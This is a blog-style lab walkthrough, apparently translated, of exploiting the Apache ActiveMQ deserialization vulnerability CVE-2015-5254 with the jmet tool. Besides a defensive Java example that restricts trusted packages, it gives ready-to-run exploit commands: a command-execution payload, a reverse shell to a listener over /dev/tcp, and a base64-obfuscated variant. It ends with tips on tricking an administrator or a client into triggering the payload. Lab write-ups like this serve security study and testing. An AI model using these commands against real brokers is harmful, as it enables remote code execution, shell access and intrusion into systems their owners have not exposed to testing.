This article is for learning purposes only; all of the steps are collected from the internet. The blogger cannot verify whether a user is using the tutorials and software on this site for real-world attacks, so please use them only within the scope permitted by domestic law.
If a user uses them illegally, in violation of national laws and regulations, all negative consequences are borne solely by that user;
the blogger is neither responsible nor liable for any direct, indirect or consequential loss.
* The vulnerability discussed in this article has already been fixed and reported to the vendor. This is a technical research and discussion article only; use for illegal purposes is strictly prohibited, and anyone who does so bears all resulting consequences.
ActiveMQ deserialization vulnerability (CVE-2015-5254)
Apache ActiveMQ is an open-source message-oriented middleware developed by the Apache Software Foundation in the United States. It supports the Java Message Service (JMS), clustering, the Spring Framework, and more.
Apache ActiveMQ 5.x before version 5.13.0 has a security vulnerability that stems from the broker not restricting which classes may be deserialized. A remote attacker can exploit it by sending a specially crafted serialized Java Message Service (JMS) ObjectMessage, leading to arbitrary code execution.
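As a defensive counterpart to the description above, here is an added consumer-side example (not from the original post or from the ActiveMQ project) showing the mitigation that shipped with 5.13.0: restricting the packages an ObjectMessage body may be deserialized from via ActiveMQConnectionFactory.setTrustedPackages. The broker URL, queue name and package com.example.dto are constructed placeholders; the same allow-list can also be set without code changes through the system property org.apache.activemq.SERIALIZABLE_PACKAGES.

```java
import java.util.Arrays;
import javax.jms.Connection;
import javax.jms.JMSException;
import javax.jms.Message;
import javax.jms.MessageConsumer;
import javax.jms.ObjectMessage;
import javax.jms.Session;
import org.apache.activemq.ActiveMQConnectionFactory;

public class HardenedConsumer {
    // Constructed placeholders: broker address and queue name.
    static final String BROKER_URL = "tcp://broker.example:61616";
    static final String QUEUE = "event";

    public static void main(String[] args) throws JMSException {
        ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory(BROKER_URL);
        // Fix introduced in 5.13.0: only classes from these packages may be
        // deserialized out of an ObjectMessage. Calling setTrustAllPackages(true)
        // would restore the unrestricted pre-5.13.0 behaviour, so keep it false.
        factory.setTrustedPackages(Arrays.asList("com.example.dto")); // placeholder package
        factory.setTrustAllPackages(false);

        Connection connection = factory.createConnection();
        connection.start();
        try {
            Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
            MessageConsumer consumer = session.createConsumer(session.createQueue(QUEUE));
            Message message = consumer.receive(5000);
            if (message instanceof ObjectMessage) {
                handle((ObjectMessage) message);
            }
        } finally {
            connection.close();
        }
    }

    static void handle(ObjectMessage message) {
        try {
            // getObject() is where deserialization happens; a gadget-chain class
            // outside the trusted packages is rejected with a JMSException
            // instead of being instantiated.
            Object body = message.getObject();
            System.out.println("Accepted body of type " + body.getClass().getName());
        } catch (JMSException rejected) {
            // Log and drop the message; do not retry deserializing a rejected body.
            System.err.println("Rejected ObjectMessage: " + rejected.getMessage());
        }
    }
}
```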
Reference links:
Start the vulnerable environment with docker-compose up -d. When "done" appears, the container has started successfully.
Run docker ps to view the container information. You will see that ports 8161 and 61616 are exposed: 61616 is the working port, through which messages are passed, and 8161 is the web management port. Visit http://your-ip:8161
to see the web management page, although in theory this vulnerability does not require the web console at all.
Use jmet to exploit the vulnerability. First download the jmet jar file and create an external folder in the same directory (otherwise it may fail with an error that the folder does not exist).
jmet works by using ysoserial to generate and send the payload (ysoserial is bundled inside the jmet jar, so there is no need to download it separately), so we need to pick a ysoserial gadget that can be used here, such as ROME.
jmet needs a Java runtime. If Java is not installed, run apt-get install openjdk-8-jre-headless. After the installation completes, run java -version to check the installed Java version; if version information is printed, Java was installed successfully.
After Java is installed, install jmet by running the following:
Switch to the /opt directory: cd /opt/
Download jmet: sudo wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
Create the directory: mkdir external
Construct the payload: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/xxx" -Yp ROME your-ip 61616. This payload creates a file named xxx under the /tmp/ directory on the target.
At this point the target ActiveMQ will have a new queue named event. Via http://192.168.190.133:8161/admin/browse.jsp?JMSDestination=event we can see all the messages in the queue:
Clicking event triggers execution of the command.
Enter the docker container to check the situation under /tmp:
View the container ID: docker ps
Enter the container: docker exec -it <container ID> /bin/bash
Verify that the command completed successfully.
Reverse shell
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/192.168.190.134/8888 0>&1" -Yp ROME 192.168.190.133 61616
Some small tricks are needed here to get around Java's handling of the command: bash -c {echo,<base64 encoding of the payload>}|{base64,-d}|{bash,-i}
The fully constructed payload is: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5MC4xMzQvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.190.133 61616
The reverse shell is received successfully:
It is worth noting that accessing the message through the web management page and triggering the vulnerability requires administrator privileges. Without the password, we can induce the administrator to visit our link to trigger it, or disguise the message as one needed by some other legitimate service and wait for a client to access it.
End